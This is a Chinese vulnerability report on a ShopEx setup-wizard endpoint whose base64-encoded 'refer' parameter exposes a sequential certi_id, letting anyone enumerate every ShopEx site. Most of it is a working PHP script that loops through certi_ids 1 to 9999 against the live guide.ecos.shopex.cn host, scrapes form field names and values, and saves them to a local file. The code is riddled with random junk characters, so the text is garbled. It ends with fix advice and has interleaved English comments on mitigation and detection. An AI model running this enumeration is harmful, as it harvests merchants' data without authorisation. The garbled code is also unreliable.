简要描述:
ShopEx某接口缺陷（certi_id 可顺序遍历），可遍历所有使用 ShopEx 程序的网站
详细说明:
问题出现在 shopex 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数 base64 解码（base64 只是编码，并非加密）后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
) M/ N+ M% U) m+ x& J" V<?php& v: O7 ~& r" w
// Reviewer note (defensive context): this proof of concept exercises an insecure-direct-
// object-reference pattern. `certi_id` is a plain sequential integer carried inside the
// `refer` query parameter, which is only base64-ENCODED (not encrypted, not signed), so any
// value can be substituted and the wizard page apparently renders the form belonging to
// whichever certificate id is supplied.
// Server-side mitigation: authorise `certi_id` against the authenticated session (or replace
// it with an unguessable random token) and rate-limit step2.php. Detection: bursts of
// requests to step2.php from one client whose `refer` values decode to consecutive certi_ids.
! `& l: p0 h5 n$ o( z for ($i=1; $i < 10000; $i++) { // enumerate certi_id 1..9999 sequentially (the IDOR core of the PoC)
# L$ w8 b7 G$ a$ ]
ShowshopExD($i);& n; n8 a, Q& T7 y6 I. L
5 x [2 L: _! U
}
- W! e( w5 L5 ]1 S
// ShowshopExD($cid): requests step2.php with the given certificate id and, when the response
// echoes the `refer` value back, extracts every <input type="text"> name/value pair and
// appends it to c:/shopEx.txt. $cid is cast with intval(). Returns nothing.
9 M4 x/ T2 [; Z. ` function ShowshopExD($cid) {
( a# E$ I: r3 @. B
' [/ v0 B/ w) m1 {' v4 ^# n3 f $url='http://guide.ecos.shopex.cn/step2.php';" \( C/ J7 S. O
% O0 Z$ \) @0 g) n9 e $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
// base64_encode is reversible: the page's "加密/解密" wording refers to plain encoding; no secret is involved.
4 G" i4 t1 @/ x" |( q8 \6 l2 P
8 |, j) x9 v$ g& s# ] $url = $url.'?refer='.$refer;9 x' w5 d( t3 C: n8 K
2 k$ a1 V) [9 _% @8 `7 s
$ch = curl_init($url);, i2 K/ j0 U. W7 L
) {/ t& o$ K# j: _
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;) H T6 c5 P0 i; u' P
4 U% n- W# \! x. i0 \& Y. \7 T
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;: l7 W8 |' |6 G- R4 U
# _: e* s: k- X( W7 D9 Z! j
$result = curl_exec($ch);5 a3 c1 |8 N ?! N$ {
// Response body is transcoded UTF-8 -> GB2312 before matching and printing.
4 c9 t$ q% e) e' X$ M" i, m $result = mb_convert_encoding($result, "gb2312", "UTF-8");
" ]% j2 C5 u/ k8 Q9 H8 {# v( u3 m2 g+ x9 O+ H6 N7 p. J
// Only proceed when the page echoes the refer value, taken here as "this certi_id was rendered".
if(strpos($result,$refer)). l2 M( V3 H2 T+ g
' ?" y/ i3 D0 ]/ F# V
{
' u! e3 b& Y6 s1 e
, ^5 P; K- F3 Y% \9 X. Y7 _ $fp = fopen("c:/shopEx.txt",'ab'); // append results to a local file (a forensic artefact of any run of this script)
// Scrape every <input type="text" ...> element and record its name:value pair.
8 t5 X1 B7 d! z# {2 z preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);3 Y7 x, K& j/ W
" f) s% e% |+ ?' N& y4 C' h+ c8 h- s foreach ($value[1] as $key) {* T+ w: j- Y' L/ W$ Q
( n; c/ J1 M' [0 Q preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);( K7 w/ |' g! J7 _) R. C
5 H; O+ m. e9 Y, z5 A+ [* b
echo $res[1][0].':'.$res[3][0]."\r\n";, g) E0 h# d; G+ d9 b
4 T- ^1 _$ _: b. J2 @ $col =$res[1][0].':'.$res[3][0]."\r\n"; 7 f+ R0 X* U' C. Y G; }( u
6 B% x7 V$ n) r& y4 g fwrite($fp, $col, strlen($col)); & f1 d% S+ ]0 s
- N( g2 Z* ]5 P" F
}
/ N5 X4 `; w ^) x& j3 i& j0 a, h8 v4 ?2 o% Z( h% Q
echo '--------------------------------'."\r\n";: w: p8 h* p6 a' |% `7 T& b( H8 h8 b
. \0 D3 y, M/ ~ fclose($fp);
+ ~0 [& b- d/ w! J( {- t+ y( }" [1 I. ^
}
( S' q/ L9 J! ~1 y7 Y8 Q) R' b7 |1 T/ Z/ r' B% r
flush();& q5 }) F- ]- _* D1 n. S& q9 C5 k
) g7 x4 D9 K; U8 h1 \+ F- [' L curl_close($ch);
5 v$ p( Z+ ?6 k, L l$ O" r
3 K: T2 v/ d9 B% @; `' @ }; r8 g) B+ c: ~
2 g( }; Z ^* l( O- J4 T3 B?>0 _" l+ y- p2 i9 [1 c
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
修复建议：refer 换成其他加密方式。需要注意的是，仅对 refer 加密或签名只能防止参数被随意篡改、提高猜测成本；服务端仍应校验 certi_id 是否属于当前已认证的用户或会话，并对该接口做访问频率限制。